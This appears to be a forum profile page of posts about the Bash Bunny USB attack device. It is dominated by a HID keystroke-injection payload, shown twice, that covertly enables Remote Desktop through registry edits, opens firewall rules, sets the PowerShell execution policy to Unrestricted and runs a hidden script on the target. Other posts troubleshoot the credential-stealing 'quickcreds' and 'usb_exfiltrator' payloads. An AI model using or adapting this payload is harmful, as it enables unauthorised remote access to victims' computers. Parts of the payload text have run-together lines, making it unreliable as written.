Sohrce
-
Posts
7 -
Joined
-
Last visited
Posts posted by Sohrce
-
-
I downloaded the Enable RDP duckycode from the Duck Tool Kit example payloads and wanted to modify it to work on the Bash Bunny. I added a Q in front of evreything except for the strings i added Quack. Will this work and is there a difference between Quack and Q.
LED R
ATTACKMODE HID
Q DELAY 750Q GUI r
Q DELAY 1000
QUACK STRING powershell Start-Process notepad -Verb runAs
Q ENTER
Q DELAY 750
Q ALT y
Q DELAY 750
Q ENTER
Q ALT
Q SPACEQ DELAY 1000
QUACK STRING m
Q DELAY 1000
QUACK DOWNARROW
REPEAT 100Q ENTER
LED G B 100
QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0Q ENTER
QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1
ENTER
STRING netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=YesQ ENTER
QUACK STRING netsh advfirewall firewall set rule group='remote desktop' new enable=Yes
Q ENTER
QUACK
STRING Remove-Item $MyINvocation.InvocationNameQ ENTER
Q CTRL s
Q DELAY 1000
LED R B
QUACK STRING C:\Windows\config-40970.ps1Q ENTER
Q DELAY 1000
Q ALT F4
Q DELAY 750
Q GUI r
Q DELAY 750
QUACK STRING powershell Start-Process cmd -Verb runAs
Q ENTER
Q DELAY 750
Q ALT y
Q DELAY 1000
QUACK STRING mode con:cols=14 lines=1
Q ENTER
Q ALT SPACE
Q DELAY 750
QUACK STRING m
Q DELAY 750
QUACK DOWNARROW
REPEAT 100Q ENTER
QUACK STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
Q ENTER
Q DELAY 750
QUACK STRING powershell.exe -windowstyle hidden -File C:\Windows\config-40970.ps1
Q ENTER
LED G -
Thanks for replying, I eventually switched the USB port and it began working again
Now all the ports work
I have no clue what could have happened but it may have been a overheating issue
-
After running quickcreds on a windows 7 computer different from the one i installed erveything on the bash bunny for and switching back to original computer, the bash bunny is not showing any LED's
I tried switching modes but it still does not working in arming or not
Because of this I do not believe i can run recovery mode
Any tips?
-
While in arming mode, the loot folder created itself and ran the usb_exfiltrator in switch 1.
-
After running the usb_exfiltrator in switch 1 I get a windows error message when trying to open the loot file in arming mode and both switches.
When running the usb_exfiltrator i got a red LED and then Green LED and after looking through the files while still in switch one, the files seemed to be finished downloading so i unplugged the bash bunny.
Now i cannot open the lott folder and get a windows popup that says there is a problem with this drive.
Should I run the windows recovery or is there a bash bunny recovery?
Rewriting Ducky Tool Kit payloads for Bash Bunny
in Bash Bunny
Posted
LED R
ATTACKMODE HID
Q DELAY 750
Q GUI r
Q DELAY 1000
QUACK STRING powershell Start-Process notepad -Verb runAs
Q ENTER
Q DELAY 750
Q ALT y
Q DELAY 750
Q ENTER
Q ALT
Q SPACE
Q DELAY 1000
QUACK STRING m
Q DELAY 1000
QUACK DOWNARROW REPEAT 100
Q ENTER
LED G B 100
QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name fDenyTSConnections -Value 0
Q ENTER
QUACK STRING Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 1
Q ENTER
Quack STRING netsh advfirewall firewall set rule group='remote desktop - remotefx' new enable=Yes
Q ENTER
QUACK STRING netsh advfirewall firewall set rule group='remote desktop' new enable=Yes
Q ENTER
QUACK STRING Remove-Item $MyINvocation.InvocationName
Q ENTER
Q CTRL s
Q DELAY 1000